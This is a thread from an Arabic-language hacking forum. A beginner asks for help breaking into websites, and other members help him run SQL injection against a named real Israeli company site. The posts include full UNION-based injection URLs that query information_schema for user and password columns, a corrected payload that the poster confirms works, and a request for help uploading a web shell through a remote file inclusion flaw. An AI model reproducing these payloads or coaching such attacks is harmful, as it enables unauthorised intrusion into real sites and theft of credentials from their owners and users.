السلام عليكم ورحمة الله وبركاته

إخوتي الاعزاء

انا مبتدئ في عالم الهكرز
وأجرب من شروح الاخوه اختراق بعض المواقع
منها هذا الموقع بثغره sql

لكن المشكلة لما اطبق الامر ما بظهر جدول الادمن او الباسورد

هذا هو الامر

http://www.dsbeng.co.il/index.php?m_id=-50+union+select+1,2,3,4,concat%28column_name,0x3e, table_schema,0x3e,table_name%29,6,7,8,9,10,11+from +information_schema.columns+where+column_name%20+l ike+char%2837,%20112,%2097,%20115,%20115,%2037%29--

أرجو منكم المساعدة وتعليمي كيف الاختراق خصوصا ثغرة remote اللي بترفع منها الشل
مش راضي يزبط معي ولا موقع خصوصا بالبحث عن الثغرات مع اني قرأت كثيرا

وشكرا لكم

تفـضل آلحقـنة آلــصحيحة ..
http://www.dsbeng.co.il/index.php?m_id=-50+union+select+1,2,3,4,group_concat%28table_name, 0x3e,column_name%29,6,7,8,9,10,11+from+information _schema.columns+where+column_name+like+char%2837,1 17,115,101,114,37%20%29--

انت حقـنتك غـير وآنآ حقـنتي غـير يـعني ثـغرة sql تستطيع حقـنهآ بطرق كثـيرة

آذآ كنت تريد آن تتعلم حقـنتي آدخل آلدورة لsql في قـسم آلـدورآت وآلـتعليم آلــمستمر ..

لـكن آذآ كنت تقصد ثغـرة آلـرموت فآيل هـذي منقرضة جدا جدا .

آذآ وجدتـهآ رآح تكــون من آلــمحظوظيين ...

موفــق ..

اخي العزيز
نسخت رابطتك ولصقته بالمتصفح طلعلي صورة

ياريت تشرحلي الطريقة اكتر وايش اللي اسوية

بارك الله فيك واعذرني علي الغلبه

اي صورة تقـصد ..؟

هذا الرابط


http://www.dsbeng.co.il/index.php?m_id=-50+union+select+1,2,3,4,group_concat%28table_name, 0x3e,column_name%29,6,7,8,9,10,11+from+information _schema.columns+where+column_name+like+char%2837,1 17,115,101,114,37%20%29

الرابط التاني زبط
جزاك الله خيرا كثيرا اخي العزيز
ولكن في مشكلة تانيه وانا منك خجلان

الطريقة اللي انت حقنت فيها ما بعرفها .. وبتختلف عن اللي تعلمتها من شرح احد الاخوه

فعشان هيك مش عارف اكمل
كنت نفسي افهم الطريقة اللي بتحقن فيها

والعذر عن خيار الناس مقبولو